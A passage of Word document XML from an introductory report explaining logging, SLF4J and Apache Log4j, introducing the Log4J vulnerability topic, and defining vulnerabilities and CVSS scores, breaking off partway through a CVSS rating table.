        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc126223989"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">What is </w:t>
      </w:r>
      <w:r w:rsidR="000A2808">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log4J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="73F1D75D" w14:textId="4C3B7B0F" w:rsidR="000A2808" w:rsidRPr="003A290F" w:rsidRDefault="000A2808" w:rsidP="000A2808">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc126223990"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r w:rsidR="006C0B9A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ging/log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A88A10" w14:textId="0D5B73F0" w:rsidR="000A2808" w:rsidRDefault="000A2808" w:rsidP="000A2808">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r w:rsidR="006C0B9A">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ging is an</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> effective method for </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>analysing</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> and troubleshooting an </w:t>
      </w:r>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>lication’</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="000A2808">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> behaviour during runtime. Logs are used to record and store crucial data so that it is always accessible for analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1AC66" w14:textId="647817F8" w:rsidR="00B55633" w:rsidRDefault="00B55633" w:rsidP="000A2808">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55633">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>A few benefits of logging include quick problem identification, simple maintenance, operational efficiencies. However, logging also increases code size, adds runtime overhead, and can have a negative impact on an application's performance if it incorporates poor coding practises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA25686" w14:textId="776B36B9" w:rsidR="00F84CE9" w:rsidRPr="003A290F" w:rsidRDefault="00F84CE9" w:rsidP="00F84CE9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc126223991"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>4J</w:t>
      </w:r>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DE0867" w14:textId="75D8E334" w:rsidR="00F84CE9" w:rsidRDefault="00577BAE" w:rsidP="00F84CE9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00577BAE">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">SLF4J, Simple Logging Facade for Java provides a simple abstraction of all the logging frameworks. It enables to work with any of the logging frameworks such as Log4j, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00577BAE">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Logback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00577BAE">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>, JUL (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00577BAE">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>java.util</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00577BAE">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.logging</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00577BAE">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>), etc. using single dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C6958" w14:textId="3BD28D33" w:rsidR="00F84CE9" w:rsidRDefault="000B3FE7" w:rsidP="000B3FE7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60433EF6" wp14:editId="1340E65F">
            <wp:extent cx="4381500" cy="223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302" cy="2237099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="177FAA55" w14:textId="0CB73C82" w:rsidR="000B3FE7" w:rsidRDefault="00086584" w:rsidP="000B3FE7">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00086584">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>A well-known and established logging framework is Apache Log4j. It was developed in Java in the beginning of 1996 and is a reliable, flexible, and efficient logging framework or API. The Apache software licence governs how it is distributed. Log4J has been ported to Python, Perl, C, C++, C#, Ruby, and Eiffel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> languages</w:t>
      </w:r>
      <w:r w:rsidRPr="00086584">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00912C43">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00912C43" w:rsidRPr="00912C43">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4j prioritises the logging process and provides ways for </w:t>
      </w:r>
      <w:r w:rsidR="00912C43">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>directing</w:t>
      </w:r>
      <w:r w:rsidR="00912C43" w:rsidRPr="00912C43">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> log information to many different destinations, including a terminal, database, file, UNIX Syslog, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45240E10" w14:textId="61CC9D1E" w:rsidR="005340B4" w:rsidRPr="003A290F" w:rsidRDefault="005340B4" w:rsidP="005340B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc126223992"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Why </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log4J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C990364" w14:textId="5245437B" w:rsidR="005340B4" w:rsidRDefault="00E25682" w:rsidP="005340B4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E25682">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>The main reasons for using Log4J are that it is open source, thread-safe, optimised for speed, based on named logger hierarchy, supports internationalisation, designed to manage java exceptions, and much more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56377618" w14:textId="11EA25E6" w:rsidR="000A2808" w:rsidRPr="003A290F" w:rsidRDefault="00FD0A67" w:rsidP="000A2808">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc126223993"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log4</w:t>
      </w:r>
      <w:r w:rsidR="000240FA">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidR="000A2808">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="000240FA">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4C427154" w14:textId="0DCC4BDC" w:rsidR="00CE57CD" w:rsidRPr="003A290F" w:rsidRDefault="00CE57CD" w:rsidP="00CE57CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc126223994"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00A62B79">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>hat is Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02762A" w14:textId="760A4BF0" w:rsidR="00CE57CD" w:rsidRDefault="00A62B79" w:rsidP="00CE57CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62B79">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Application vulnerabilities are flaws in a software system that a hacker could use to breach the system's security. Vulnerabilities can be introduced into an application through a variety of means, including pitfalls in the design, implementation, or configuration of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757BEA25" w14:textId="54066837" w:rsidR="00CE57CD" w:rsidRPr="003A290F" w:rsidRDefault="005E0942" w:rsidP="00CE57CD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc126223995"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>CVSS</w:t>
      </w:r>
      <w:r w:rsidR="00C61177">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>, CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidR="00CE57CD" w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD272D2" w14:textId="387EB5E5" w:rsidR="00CE57CD" w:rsidRDefault="00731BB2" w:rsidP="00CE57CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00731BB2">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>The Common Vulnerability Scoring System (aka CVSS Scores) provides a numerical (0-10) value to the severity of an information security vulnerability. CVSS scores are commonly used by information security teams as part of a vulnerability program – to provide a point of comparison between vulnerabilities and to prioritise vulnerability remediation.</w:t>
      </w:r>
      <w:r w:rsidR="00015769">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1490AC" w14:textId="6F05D3BB" w:rsidR="00EB769A" w:rsidRDefault="00EB769A" w:rsidP="00B22B73">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="531785E9" wp14:editId="2C3CB3F9">
            <wp:extent cx="5731510" cy="2807970"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="CVSS Scor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SS Score Metr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07970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9891A3" w14:textId="28734BA4" w:rsidR="00EB769A" w:rsidRPr="001560DA" w:rsidRDefault="00CB46CB" w:rsidP="004F3F0A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001560DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>CVSS Qualitative Ratings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A298D3F" w14:textId="1AB4CD9F" w:rsidR="00CB46CB" w:rsidRDefault="004F3F0A" w:rsidP="00CE57CD">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>The Quali</w:t>
      </w:r>
      <w:r w:rsidR="009E482D">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">tative ratings of the CVSS scores mapped to 0 to 10 and </w:t>
      </w:r>
      <w:r w:rsidR="00BE7ACA">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>this rating will be helpful while discuss about the vulnerability with the less technical stakeholders</w:t>
      </w:r>
      <w:r w:rsidR="0076254D">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25411AD7" w14:textId="6321EEA3" w:rsidR="0076254D" w:rsidRDefault="0076254D" w:rsidP="00B22B73">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>The ratings are,</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2010"/>
        <w:gridCol w:w="2010"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B22B73" w14:paraId="24324401" w14:textId="77777777" w:rsidTr="00B22B73">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5178F0F4" w14:textId="7C531B09" w:rsidR="00B22B73" w:rsidRDefault="00BB5E17" w:rsidP="00B22B73">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C0A2CC" w14:textId="79077CA5" w:rsidR="00B22B73" w:rsidRDefault="00BB5E17" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22B73" w14:paraId="07574C14" w14:textId="77777777" w:rsidTr="00B22B73">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37679050" w14:textId="3E8B4A59" w:rsidR="00B22B73" w:rsidRDefault="00BB5E17" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>0.1 – 3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B181E83" w14:textId="2BCC8592" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22B73" w14:paraId="08B4C8F7" w14:textId="77777777" w:rsidTr="00B22B73">
        <w:trPr>
          <w:trHeight w:val="285"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B0E4F7E" w14:textId="2A9E4D5E" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>4.0 – 6.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
